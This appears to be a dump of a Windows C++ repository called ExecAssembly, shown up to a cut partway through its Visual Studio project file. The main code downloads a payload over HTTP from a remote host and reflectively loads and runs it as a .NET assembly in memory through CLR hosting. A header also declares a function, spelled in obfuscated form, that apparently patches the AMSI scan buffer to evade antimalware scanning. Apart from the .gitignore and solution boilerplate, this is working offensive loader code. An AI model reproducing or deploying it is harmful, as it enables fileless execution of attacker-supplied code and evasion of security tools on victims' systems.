├── .gitignore
├── ExecAssembly.sln
├── ExecAssembly
    ├── DoHttpDownload.cpp
    ├── DoReflectiveAssembly.cpp
    ├── Downloader.h
    ├── ExecAssembly.h
    ├── ExecAssembly.vcxproj
    ├── ExecAssembly.vcxproj.filters
    ├── Patch_AhEhmEssHee.cpp
    ├── Utils.cpp
    ├── Utils.h
    ├── main.cpp
    └── stdafx.h
├── README.md
└── screens
    ├── assembly-1.png
    └── assembly-2.png


/.gitignore:
--------------------------------------------------------------------------------
  1 | ## Ignore Visual Studio temporary files, build results, and
  2 | ## files generated by popular Visual Studio add-ons.
  3 | ##
  4 | ## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore
  5 | 
  6 | # User-specific files
  7 | *.rsuser
  8 | *.suo
  9 | *.user
 10 | *.userosscache
 11 | *.sln.docstates
 12 | 
 13 | # User-specific files (MonoDevelop/Xamarin Studio)
 14 | *.userprefs
 15 | 
 16 | # Mono auto generated files
 17 | mono_crash.*
 18 | 
 19 | # Build results
 20 | [Dd]ebug/
 21 | [Dd]ebugPublic/
 22 | [Rr]elease/
 23 | [Rr]eleases/
 24 | x64/
 25 | x86/
 26 | [Ww][Ii][Nn]32/
 27 | [Aa][Rr][Mm]/
 28 | [Aa][Rr][Mm]64/
 29 | bld/
 30 | [Bb]in/
 31 | [Oo]bj/
 32 | [Ll]og/
 33 | [Ll]ogs/
 34 | 
 35 | # Visual Studio 2015/2017 cache/options directory
 36 | .vs/
 37 | # Uncomment if you have tasks that create the project's static files in wwwroot
 38 | #wwwroot/
 39 | 
 40 | # Visual Studio 2017 auto generated files
 41 | Generated\ Files/
 42 | 
 43 | # MSTest test Results
 44 | [Tt]est[Rr]esult*/
 45 | [Bb]uild[Ll]og.*
 46 | 
 47 | # NUnit
 48 | *.VisualState.xml
 49 | TestResult.xml
 50 | nunit-*.xml
 51 | 
 52 | # Build Results of an ATL Project
 53 | [Dd]ebugPS/
 54 | [Rr]eleasePS/
 55 | dlldata.c
 56 | 
 57 | # Benchmark Results
 58 | BenchmarkDotNet.Artifacts/
 59 | 
 60 | # .NET Core
 61 | project.lock.json
 62 | project.fragment.lock.json
 63 | artifacts/
 64 | 
 65 | # ASP.NET Scaffolding
 66 | ScaffoldingReadMe.txt
 67 | 
 68 | # StyleCop
 69 | StyleCopReport.xml
 70 | 
 71 | # Files built by Visual Studio
 72 | *_i.c
 73 | *_p.c
 74 | *_h.h
 75 | *.ilk
 76 | *.meta
 77 | *.obj
 78 | *.iobj
 79 | *.pch
 80 | *.pdb
 81 | *.ipdb
 82 | *.pgc
 83 | *.pgd
 84 | *.rsp
 85 | # but not Directory.Build.rsp, as it configures directory-level build defaults
 86 | !Directory.Build.rsp
 87 | *.sbr
 88 | *.tlb
 89 | *.tli
 90 | *.tlh
 91 | *.tmp
 92 | *.tmp_proj
 93 | *_wpftmp.csproj
 94 | *.log
 95 | *.tlog
 96 | *.vspscc
 97 | *.vssscc
 98 | .builds
 99 | *.pidb
100 | *.svclog
101 | *.scc
102 | 
103 | # Chutzpah Test files
104 | _Chutzpah*
105 | 
106 | # Visual C++ cache files
107 | ipch/
108 | *.aps
109 | *.ncb
110 | *.opendb
111 | *.opensdf
112 | *.sdf
113 | *.cachefile
114 | *.VC.db
115 | *.VC.VC.opendb
116 | 
117 | # Visual Studio profiler
118 | *.psess
119 | *.vsp
120 | *.vspx
121 | *.sap
122 | 
123 | # Visual Studio Trace Files
124 | *.e2e
125 | 
126 | # TFS 2012 Local Workspace
127 | $tf/
128 | 
129 | # Guidance Automation Toolkit
130 | *.gpState
131 | 
132 | # ReSharper is a .NET coding add-in
133 | _ReSharper*/
134 | *.[Rr]e[Ss]harper
135 | *.DotSettings.user
136 | 
137 | # TeamCity is a build add-in
138 | _TeamCity*
139 | 
140 | # DotCover is a Code Coverage Tool
141 | *.dotCover
142 | 
143 | # AxoCover is a Code Coverage Tool
144 | .axoCover/*
145 | !.axoCover/settings.json
146 | 
147 | # Coverlet is a free, cross platform Code Coverage Tool
148 | coverage*.json
149 | coverage*.xml
150 | coverage*.info
151 | 
152 | # Visual Studio code coverage results
153 | *.coverage
154 | *.coveragexml
155 | 
156 | # NCrunch
157 | _NCrunch_*
158 | .*crunch*.local.xml
159 | nCrunchTemp_*
160 | 
161 | # MightyMoose
162 | *.mm.*
163 | AutoTest.Net/
164 | 
165 | # Web workbench (sass)
166 | .sass-cache/
167 | 
168 | # Installshield output folder
169 | [Ee]xpress/
170 | 
171 | # DocProject is a documentation generator add-in
172 | DocProject/buildhelp/
173 | DocProject/Help/*.HxT
174 | DocProject/Help/*.HxC
175 | DocProject/Help/*.hhc
176 | DocProject/Help/*.hhk
177 | DocProject/Help/*.hhp
178 | DocProject/Help/Html2
179 | DocProject/Help/html
180 | 
181 | # Click-Once directory
182 | publish/
183 | 
184 | # Publish Web Output
185 | *.[Pp]ublish.xml
186 | *.azurePubxml
187 | # Note: Comment the next line if you want to checkin your web deploy settings,
188 | # but database connection strings (with potential passwords) will be unencrypted
189 | *.pubxml
190 | *.publishproj
191 | 
192 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
193 | # checkin your Azure Web App publish settings, but sensitive information contained
194 | # in these scripts will be unencrypted
195 | PublishScripts/
196 | 
197 | # NuGet Packages
198 | *.nupkg
199 | # NuGet Symbol Packages
200 | *.snupkg
201 | # The packages folder can be ignored because of Package Restore
202 | **/[Pp]ackages/*
203 | # except build/, which is used as an MSBuild target.
204 | !**/[Pp]ackages/build/
205 | # Uncomment if necessary however generally it will be regenerated when needed
206 | #!**/[Pp]ackages/repositories.config
207 | # NuGet v3's project.json files produces more ignorable files
208 | *.nuget.props
209 | *.nuget.targets
210 | 
211 | # Microsoft Azure Build Output
212 | csx/
213 | *.build.csdef
214 | 
215 | # Microsoft Azure Emulator
216 | ecf/
217 | rcf/
218 | 
219 | # Windows Store app package directories and files
220 | AppPackages/
221 | BundleArtifacts/
222 | Package.StoreAssociation.xml
223 | _pkginfo.txt
224 | *.appx
225 | *.appxbundle
226 | *.appxupload
227 | 
228 | # Visual Studio cache files
229 | # files ending in .cache can be ignored
230 | *.[Cc]ache
231 | # but keep track of directories ending in .cache
232 | !?*.[Cc]ache/
233 | 
234 | # Others
235 | ClientBin/
236 | ~$*
237 | *~
238 | *.dbmdl
239 | *.dbproj.schemaview
240 | *.jfm
241 | *.pfx
242 | *.publishsettings
243 | orleans.codegen.cs
244 | 
245 | # Including strong name files can present a security risk
246 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
247 | #*.snk
248 | 
249 | # Since there are multiple workflows, uncomment next line to ignore bower_components
250 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
251 | #bower_components/
252 | 
253 | # RIA/Silverlight projects
254 | Generated_Code/
255 | 
256 | # Backup & report files from converting an old project file
257 | # to a newer Visual Studio version. Backup files are not needed,
258 | # because we have git ;-)
259 | _UpgradeReport_Files/
260 | Backup*/
261 | UpgradeLog*.XML
262 | UpgradeLog*.htm
263 | ServiceFabricBackup/
264 | *.rptproj.bak
265 | 
266 | # SQL Server files
267 | *.mdf
268 | *.ldf
269 | *.ndf
270 | 
271 | # Business Intelligence projects
272 | *.rdl.data
273 | *.bim.layout
274 | *.bim_*.settings
275 | *.rptproj.rsuser
276 | *- [Bb]ackup.rdl
277 | *- [Bb]ackup ([0-9]).rdl
278 | *- [Bb]ackup ([0-9][0-9]).rdl
279 | 
280 | # Microsoft Fakes
281 | FakesAssemblies/
282 | 
283 | # GhostDoc plugin setting file
284 | *.GhostDoc.xml
285 | 
286 | # Node.js Tools for Visual Studio
287 | .ntvs_analysis.dat
288 | node_modules/
289 | 
290 | # Visual Studio 6 build log
291 | *.plg
292 | 
293 | # Visual Studio 6 workspace options file
294 | *.opt
295 | 
296 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
297 | *.vbw
298 | 
299 | # Visual Studio 6 auto-generated project file (contains which files were open etc.)
300 | *.vbp
301 | 
302 | # Visual Studio 6 workspace and project file (working project files containing files to include in project)
303 | *.dsw
304 | *.dsp
305 | 
306 | # Visual Studio 6 technical files
307 | *.ncb
308 | *.aps
309 | 
310 | # Visual Studio LightSwitch build output
311 | **/*.HTMLClient/GeneratedArtifacts
312 | **/*.DesktopClient/GeneratedArtifacts
313 | **/*.DesktopClient/ModelManifest.xml
314 | **/*.Server/GeneratedArtifacts
315 | **/*.Server/ModelManifest.xml
316 | _Pvt_Extensions
317 | 
318 | # Paket dependency manager
319 | .paket/paket.exe
320 | paket-files/
321 | 
322 | # FAKE - F# Make
323 | .fake/
324 | 
325 | # CodeRush personal settings
326 | .cr/personal
327 | 
328 | # Python Tools for Visual Studio (PTVS)
329 | __pycache__/
330 | *.pyc
331 | 
332 | # Cake - Uncomment if you are using it
333 | # tools/**
334 | # !tools/packages.config
335 | 
336 | # Tabs Studio
337 | *.tss
338 | 
339 | # Telerik's JustMock configuration file
340 | *.jmconfig
341 | 
342 | # BizTalk build output
343 | *.btp.cs
344 | *.btm.cs
345 | *.odx.cs
346 | *.xsd.cs
347 | 
348 | # OpenCover UI analysis results
349 | OpenCover/
350 | 
351 | # Azure Stream Analytics local run output
352 | ASALocalRun/
353 | 
354 | # MSBuild Binary and Structured Log
355 | *.binlog
356 | 
357 | # NVidia Nsight GPU debugger configuration file
358 | *.nvuser
359 | 
360 | # MFractors (Xamarin productivity tool) working folder
361 | .mfractor/
362 | 
363 | # Local History for Visual Studio
364 | .localhistory/
365 | 
366 | # Visual Studio History (VSHistory) files
367 | .vshistory/
368 | 
369 | # BeatPulse healthcheck temp database
370 | healthchecksdb
371 | 
372 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
373 | MigrationBackup/
374 | 
375 | # Ionide (cross platform F# VS Code tools) working folder
376 | .ionide/
377 | 
378 | # Fody - auto-generated XML schema
379 | FodyWeavers.xsd
380 | 
381 | # VS Code files for those working on multiple tools
382 | .vscode/*
383 | !.vscode/settings.json
384 | !.vscode/tasks.json
385 | !.vscode/launch.json
386 | !.vscode/extensions.json
387 | *.code-workspace
388 | 
389 | # Local History for Visual Studio Code
390 | .history/
391 | 
392 | # Windows Installer files from build outputs
393 | *.cab
394 | *.msi
395 | *.msix
396 | *.msm
397 | *.msp
398 | 
399 | # JetBrains Rider
400 | *.sln.iml
401 | 


--------------------------------------------------------------------------------
/ExecAssembly.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.12.35707.178 d17.12
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExecAssembly", "ExecAssembly\ExecAssembly.vcxproj", "{9ABA4F97-44F0-4777-9259-88339CB373B5}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{9ABA4F97-44F0-4777-9259-88339CB373B5}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{9ABA4F97-44F0-4777-9259-88339CB373B5}.Debug|x64.Build.0 = Debug|x64
18 | 		{9ABA4F97-44F0-4777-9259-88339CB373B5}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{9ABA4F97-44F0-4777-9259-88339CB373B5}.Debug|x86.Build.0 = Debug|Win32
20 | 		{9ABA4F97-44F0-4777-9259-88339CB373B5}.Release|x64.ActiveCfg = Release|x64
21 | 		{9ABA4F97-44F0-4777-9259-88339CB373B5}.Release|x64.Build.0 = Release|x64
22 | 		{9ABA4F97-44F0-4777-9259-88339CB373B5}.Release|x86.ActiveCfg = Release|Win32
23 | 		{9ABA4F97-44F0-4777-9259-88339CB373B5}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | EndGlobal
29 | 


--------------------------------------------------------------------------------
/ExecAssembly/DoHttpDownload.cpp:
--------------------------------------------------------------------------------
 1 | #include "Downloader.h"
 2 | 
 3 | std::vector<BYTE> DoHttpDownload(LPCWSTR baseAddress, LPCWSTR filepath) {
 4 | 
 5 |     // initialise session
 6 |     HINTERNET hSession = WinHttpOpen(
 7 |         NULL,
 8 |         WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY,    // proxy aware
 9 |         WINHTTP_NO_PROXY_NAME,
10 |         WINHTTP_NO_PROXY_BYPASS,
11 |         0
12 |         //WINHTTP_FLAG_SECURE_DEFAULTS            // enable ssl
13 |     );
14 | 
15 |     // create session for target
16 |     HINTERNET hConnect = WinHttpConnect(
17 |         hSession,
18 |         baseAddress,
19 |         INTERNET_DEFAULT_HTTP_PORT,            // port 80
20 |         //INTERNET_DEFAULT_HTTPS_PORT,            // port 443
21 |         0);
22 | 
23 |     // create request handle
24 |     HINTERNET hRequest = WinHttpOpenRequest(
25 |         hConnect,
26 |         L"GET",
27 |         filepath,
28 |         NULL,
29 |         WINHTTP_NO_REFERER,
30 |         WINHTTP_DEFAULT_ACCEPT_TYPES,
31 |         0
32 |         //WINHTTP_FLAG_SECURE                    //ssl
33 |     );
34 | 
35 |     // send the request
36 |     WinHttpSendRequest(
37 |         hRequest,
38 |         WINHTTP_NO_ADDITIONAL_HEADERS,
39 |         0,
40 |         WINHTTP_NO_REQUEST_DATA,
41 |         0,
42 |         0,
43 |         0);
44 | 
45 |     // receive response
46 |     WinHttpReceiveResponse(
47 |         hRequest,
48 |         NULL);
49 | 
50 |     // read the data
51 |     std::vector<BYTE> buffer;
52 |     DWORD bytesRead = 0;
53 | 
54 |     do {
55 | 
56 |         BYTE temp[4096]{};
57 |         WinHttpReadData(hRequest, temp, sizeof(temp), &bytesRead);
58 | 
59 |         if (bytesRead > 0) {
60 |             buffer.insert(buffer.end(), temp, temp + bytesRead);
61 |         }
62 | 
63 |     } while (bytesRead > 0);
64 | 
65 |     // close all the handles
66 |     WinHttpCloseHandle(hRequest);
67 |     WinHttpCloseHandle(hConnect);
68 |     WinHttpCloseHandle(hSession);
69 | 
70 |     return buffer;
71 | }
72 | 


--------------------------------------------------------------------------------
/ExecAssembly/DoReflectiveAssembly.cpp:
--------------------------------------------------------------------------------
  1 | #include "ExecAssembly.h"
  2 | #include "Utils.h"
  3 | #include "stdafx.h"
  4 | 
  5 | static ICLRMetaHost* InitMetaHost()
  6 | {
  7 |     ICLRMetaHost* pMetaHost;
  8 |     HRESULT hr;
  9 | 
 10 |     pMetaHost = NULL;
 11 |     hr = CLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost, (void**)&pMetaHost);
 12 |     if (FAILED(hr))
 13 |     {
 14 |         printf("[!] InitMetaHost failed\n");
 15 |         return (NULL);
 16 |     }
 17 |     printf("[+] InitMetaHost success\n");
 18 | 
 19 |     return (pMetaHost);
 20 | }
 21 | 
 22 | /* Get ICLRRuntimeInfo instance */
 23 | static ICLRRuntimeInfo* InitRuntime(ICLRMetaHost* pMetaHost)
 24 | {
 25 |     BOOL bLoadable;
 26 |     ICLRRuntimeInfo* pRuntimeInfo;
 27 | 
 28 |     pRuntimeInfo = NULL;
 29 |     if (pMetaHost == NULL || FAILED(pMetaHost->GetRuntime(L"v4.0.30319", IID_ICLRRuntimeInfo, (void**)&pRuntimeInfo)))
 30 |     {
 31 |         printf("[!] InitRuntime failed\n");
 32 |         return (NULL);
 33 |     }
 34 | 
 35 |     printf("[+] InitRuntime success\n");
 36 | 
 37 |     /* Check if the specified runtime can be loaded */
 38 |     if (FAILED(pRuntimeInfo->IsLoadable(&bLoadable)) || !bLoadable)
 39 |     {
 40 |         printf("[!] Runtime does not appear loadable\n");
 41 |         return (NULL);
 42 |     }
 43 |     printf("[+] Runtime is loadable\n");
 44 | 
 45 |     return (pRuntimeInfo);
 46 | }
 47 | 
 48 | /* Get ICorRuntimeHost instance */
 49 | static ICorRuntimeHost* InitInterface(ICLRRuntimeInfo* pRuntimeInfo)
 50 | {
 51 |     HRESULT hr;
 52 |     ICorRuntimeHost* pRuntimeHost;
 53 | 
 54 |     pRuntimeHost = NULL;
 55 |     if (pRuntimeInfo == NULL || FAILED(pRuntimeInfo->GetInterface(CLSID_CorRuntimeHost, IID_ICorRuntimeHost, (void**)&pRuntimeHost)))
 56 |     {
 57 |         printf("[!] InitInterface failed\n");
 58 |         return (NULL);
 59 |     }
 60 | 
 61 |     printf("[+] InitInterface success\n");
 62 | 
 63 |     /* Start the CLR */
 64 |     hr = pRuntimeHost->Start();
 65 |     if (FAILED(hr))
 66 |     {
 67 |         printf("[!] Could not start the Runtime\n");
 68 |         return (NULL);
 69 |     }
 70 | 
 71 |     printf("[+] Runtime started\n");
 72 |     return (pRuntimeHost);
 73 | }
 74 | 
 75 | static _AppDomainPtr GetDefaultDomain(ICorRuntimeHost* pRuntimeHost)
 76 | {
 77 |     IUnknownPtr pAppDomainThunk;
 78 |     _AppDomainPtr pDefaultAppDomain = NULL;
 79 | 
 80 |     pAppDomainThunk = NULL;
 81 |     if (!pRuntimeHost || FAILED(pRuntimeHost->GetDefaultDomain(&pAppDomainThunk)))
 82 |     {
 83 |         printf("[!] Could not load Default Domain failed\n");
 84 |         return (NULL);
 85 |     }
 86 |     printf("[+] Opened Default Domain\n");
 87 | 
 88 |     /* Equivalent of System.AppDomain.CurrentDomain in C# */
 89 |     if (!pAppDomainThunk || FAILED(pAppDomainThunk->QueryInterface(__uuidof(_AppDomain), (void**)&pDefaultAppDomain)))
 90 |     {
 91 |         printf("[!] Default Domain has no interface ???\n");
 92 |         return (NULL);
 93 |     }
 94 | 
 95 |     printf("[+] Interface opened on Default Domain\n");
 96 |     return (pDefaultAppDomain);
 97 | }
 98 | 
 99 | static SAFEARRAY* InitAssemblyMemory()
100 | {
101 |     void* pvData;
102 |     SAFEARRAY* pSafeArray;
103 |     SAFEARRAYBOUND rgsabound[1];
104 | 
105 |     pvData = NULL;
106 |     rgsabound[0].cElements = rawDataLength;
107 |     rgsabound[0].lLbound = 0;
108 |     pSafeArray = SafeArrayCreate(VT_UI1, 1, rgsabound);
109 |     if (FAILED(SafeArrayAccessData(pSafeArray, &pvData)))
110 |     {
111 |         printf("[!] InitAssemblyMemory failed\n");
112 |         return (NULL);
113 |     }
114 |     printf("[+] InitAssemblyMemory success\n");
115 | 
116 |     memcpy(pvData, rawData, rawDataLength);
117 |     SafeArrayUnaccessData(pSafeArray);
118 |     return (pSafeArray);
119 | }
120 | 
121 | static _AssemblyPtr LoadAssembly(_AppDomainPtr pDefaultAppDomain, SAFEARRAY* pSafeArray)
122 | {
123 |     _AssemblyPtr pAssembly;
124 | 
125 |     pAssembly = NULL;
126 |     /* Equivalent of System.AppDomain.CurrentDomain.Load(byte[] rawAssembly) */
127 |     if (!pDefaultAppDomain || !pSafeArray || FAILED(pDefaultAppDomain->Load_3(pSafeArray, &pAssembly)))
128 |     {
129 |         printf("[!] Could not load assembly\n");
130 |         return (NULL);
131 |     }
132 | 
133 |     printf("[+] Assembly loaded\n");
134 |     return (pAssembly);
135 | }
136 | 
137 | static _MethodInfoPtr ParseEntryPoint(_AssemblyPtr pAssembly)
138 | {
139 |     _MethodInfoPtr pMethodInfo;
140 | 
141 |     /* Assembly.EntryPoint Property */
142 |     pMethodInfo = NULL;
143 |     if (!pAssembly || FAILED(pAssembly->get_EntryPoint(&pMethodInfo)))
144 |     {
145 |         printf("[!] Could not retrieve assembly's entry point\n");
146 |         return (NULL);
147 |     }
148 |     printf("[+] Assembly's entry point parsed\n");
149 |     return (pMethodInfo);
150 | }
151 | 
152 | static SAFEARRAY* CreateArguments(int argc, char** argv)
153 | {
154 |     long index = 0;
155 |     VARIANT vtPsa;
156 |     SAFEARRAYBOUND saBound;
157 |     SAFEARRAY* psaStaticMethodArgs;
158 | 
159 |     saBound.cElements = 1;
160 |     saBound.lLbound = 0;
161 |     psaStaticMethodArgs = SafeArrayCreateVector(VT_VARIANT, 0, 1);
162 | 
163 |     vtPsa.vt = (VT_ARRAY | VT_BSTR);
164 |     vtPsa.parray = SafeArrayCreateVector(VT_BSTR, 0, argc);
165 |     for (long i = 0; i < argc; i++)
166 |     {
167 |         SafeArrayPutElement(vtPsa.parray, &i, SysAllocString(CstrToLpwstr(argv[i])));
168 |     }
169 | 
170 |     long idx[1] = { 0 };
171 |     SafeArrayPutElement(psaStaticMethodArgs, idx, &vtPsa);
172 |     return (psaStaticMethodArgs);
173 | }
174 | 
175 | void DoReflectiveAssembly(int argc, char** argv)
176 | {
177 |     ICLRMetaHost* pMetaHost = NULL;
178 |     ICLRRuntimeInfo* pRuntimeInfo = NULL;
179 |     ICorRuntimeHost* pRuntimeHost = NULL;
180 |     _AppDomainPtr pDefaultAppDomain = NULL;
181 |     SAFEARRAY* pSafeArray;
182 |     _AssemblyPtr pAssembly;
183 |     _MethodInfoPtr pMethodInfo;
184 |     SAFEARRAY* psaStaticMethodArgs;
185 |     VARIANT obj;
186 |     VARIANT retVal;
187 |     HRESULT hr;
188 | 
189 |     pMetaHost = InitMetaHost();
190 |     pRuntimeInfo = InitRuntime(pMetaHost);
191 |     pRuntimeHost = InitInterface(pRuntimeInfo);
192 |     pDefaultAppDomain = GetDefaultDomain(pRuntimeHost);
193 |     pSafeArray = InitAssemblyMemory();
194 |     pAssembly = LoadAssembly(pDefaultAppDomain, pSafeArray);
195 |     pMethodInfo = ParseEntryPoint(pAssembly);
196 |     psaStaticMethodArgs = CreateArguments(argc, argv);
197 | 
198 |     if (pMethodInfo == NULL)
199 |         return;
200 | 
201 |     /* EntryPoint.Invoke(null, new object[0]) */
202 |     ZeroMemory(&obj, sizeof(VARIANT));
203 |     ZeroMemory(&retVal, sizeof(VARIANT));
204 |     obj.vt = VT_NULL;
205 | 
206 |     hr = pMethodInfo->Invoke_3(obj, psaStaticMethodArgs, &retVal);
207 |     if (FAILED(hr))
208 |     {
209 |         printf("[!] Failed to invoke Assembly, is Main's signature matching: static void Main(string[] args) ? hr = %X\n", hr);
210 |         return;
211 |     }
212 |     printf("[+] Invocation success\n");
213 | }
214 | 


--------------------------------------------------------------------------------
/ExecAssembly/Downloader.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | #ifndef DOWNLOADER_H
 4 | # define DOWNLOADER_H
 5 | 
 6 | # include <Windows.h>
 7 | # include <winhttp.h>
 8 | # include <iostream>
 9 | # include <vector>
10 | 
11 | # pragma comment(lib, "winhttp.lib")
12 | 
13 | std::vector<BYTE> DoHttpDownload(LPCWSTR baseAddress, LPCWSTR filepath);
14 | 
15 | #endif
16 | 


--------------------------------------------------------------------------------
/ExecAssembly/ExecAssembly.h:
--------------------------------------------------------------------------------
 1 | #ifndef EXEC_ASSEMBLY_H
 2 | # define EXEC_ASSEMBLY_H
 3 | 
 4 | # include <iostream>
 5 | # include <fstream>
 6 | # include <metahost.h>
 7 | # include <corerror.h>
 8 | # include <comdef.h>
 9 | 
10 | // Vars used to store raw files in memory
11 | extern unsigned char* rawData;
12 | extern size_t rawDataLength;
13 | 
14 | // DA FUNCTION
15 | void DoReflectiveAssembly(int argc, char** argv);
16 | 
17 | void PatchAhEhmEssHeeScanBuffer();
18 | 
19 | #endif
20 | 


--------------------------------------------------------------------------------
/ExecAssembly/ExecAssembly.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>17.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{9aba4f97-44f0-4777-9259-88339cb373b5}</ProjectGuid>
 25 |     <RootNamespace>ExecAssembly</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <ClCompile>
 75 |       <WarningLevel>Level3</WarningLevel>
 76 |       <SDLCheck>true</SDLCheck>
 77 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 78 |       <ConformanceMode>true</ConformanceMode>
 79 |     </ClCompile>
 80 |     <Link>
 81 |       <SubSystem>Console</SubSystem>
 82 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 83 |     </Link>
 84 |   </ItemDefinitionGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <FunctionLevelLinking>true</FunctionLevelLinking>
 89 |       <IntrinsicFunctions>true</IntrinsicFunctions>
 90 |       <SDLCheck>true</SDLCheck>
 91 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 92 |       <ConformanceMode>true</ConformanceMode>
 93 |     </ClCompile>
 94 |     <Link>
 95 |       <SubSystem>Console</SubSystem>
 96 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
 97 |       <OptimizeReferences>true</OptimizeReferences>
 98 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 99 |     </Link>
100 |   </ItemDefinitionGroup>
101 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
102 |     <ClCompile>
103 |       <WarningLevel>Level3</WarningLevel>
104 |       <SDLCheck>true</SDLCheck>
